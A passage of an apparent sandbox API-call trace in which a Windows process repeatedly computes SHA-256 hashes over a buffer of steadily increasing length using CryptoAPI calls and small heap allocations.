	[0253.247] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6138, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6138, pdwDataLen=0x128c3c) returned 1
	[0253.247] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.247] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.247] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.282] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.282] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0253.282] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6160
	[0253.282] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6160, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6160, pdwDataLen=0x128c3c) returned 1
	[0253.282] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.282] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.282] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.283] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.283] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0253.283] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6188
	[0253.283] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6188, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6188, pdwDataLen=0x128c3c) returned 1
	[0253.283] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.283] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.283] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.283] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.283] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0253.283] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c61b0
	[0253.283] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c61b0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c61b0, pdwDataLen=0x128c3c) returned 1
	[0253.283] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.283] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.283] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.284] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.284] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0253.284] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c61d8
	[0253.284] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c61d8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c61d8, pdwDataLen=0x128c3c) returned 1
	[0253.284] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.284] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.284] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.284] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.284] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0253.284] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6200
	[0253.284] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6200, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6200, pdwDataLen=0x128c3c) returned 1
	[0253.284] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.285] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.285] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.285] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.285] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0253.285] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6228
	[0253.285] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6228, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6228, pdwDataLen=0x128c3c) returned 1
	[0253.285] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.285] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.285] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.285] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.286] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0253.286] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6250
	[0253.286] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6250, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6250, pdwDataLen=0x128c3c) returned 1
	[0253.286] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.286] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.286] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.286] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.286] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0253.286] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6278
	[0253.286] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6278, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6278, pdwDataLen=0x128c3c) returned 1
	[0253.286] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.286] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.286] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.286] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.287] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0253.287] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c62a0
	[0253.287] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c62a0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c62a0, pdwDataLen=0x128c3c) returned 1
	[0253.287] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.287] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.287] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.287] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.287] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0253.287] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c62c8
	[0253.287] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c62c8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c62c8, pdwDataLen=0x128c3c) returned 1
	[0253.287] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.287] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.287] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.287] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.288] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0253.288] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c62f0
	[0253.288] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c62f0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c62f0, pdwDataLen=0x128c3c) returned 1
	[0253.288] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.288] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.288] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.288] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.288] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0253.288] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6318
	[0253.288] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6318, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6318, pdwDataLen=0x128c3c) returned 1
	[0253.288] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.288] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.288] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.288] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.289] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0253.289] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6340
	[0253.289] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6340, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6340, pdwDataLen=0x128c3c) returned 1
	[0253.289] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.289] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.289] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.289] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.289] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0253.289] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6368
	[0253.289] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6368, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6368, pdwDataLen=0x128c3c) returned 1
	[0253.289] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.289] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.289] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.289] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.290] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0253.290] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.290] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6390
	[0253.290] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6390, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6390, pdwDataLen=0x128c3c) returned 1
	[0253.290] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.290] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.290] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.290] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.290] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0253.290] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.290] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c63b8
	[0253.290] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c63b8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c63b8, pdwDataLen=0x128c3c) returned 1
	[0253.290] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.290] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.290] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.290] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.291] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0253.291] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c63e0
	[0253.291] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c63e0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c63e0, pdwDataLen=0x128c3c) returned 1
	[0253.291] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.291] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.291] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.291] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.291] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0253.291] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6408
	[0253.291] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6408, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6408, pdwDataLen=0x128c3c) returned 1
	[0253.291] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.291] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.291] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.291] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.292] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0253.292] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.292] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6430
	[0253.292] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6430, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6430, pdwDataLen=0x128c3c) returned 1
	[0253.292] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.292] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.292] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.292] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.292] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0253.292] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.292] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6458
	[0253.292] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6458, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6458, pdwDataLen=0x128c3c) returned 1
	[0253.292] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.292] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.292] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.293] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.293] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0253.293] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.293] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6480
	[0253.293] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6480, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6480, pdwDataLen=0x128c3c) returned 1
	[0253.293] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.293] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.293] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.293] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.293] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0253.293] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.293] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c64a8
	[0253.293] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c64a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c64a8, pdwDataLen=0x128c3c) returned 1
	[0253.293] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.293] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.293] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.294] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.294] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0253.294] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.294] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c64d0
	[0253.294] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c64d0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c64d0, pdwDataLen=0x128c3c) returned 1
	[0253.294] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.294] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.294] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.294] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.294] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0253.294] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.294] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c64f8
	[0253.294] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c64f8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c64f8, pdwDataLen=0x128c3c) returned 1
	[0253.294] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.294] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.294] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.295] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.295] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0253.295] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6520
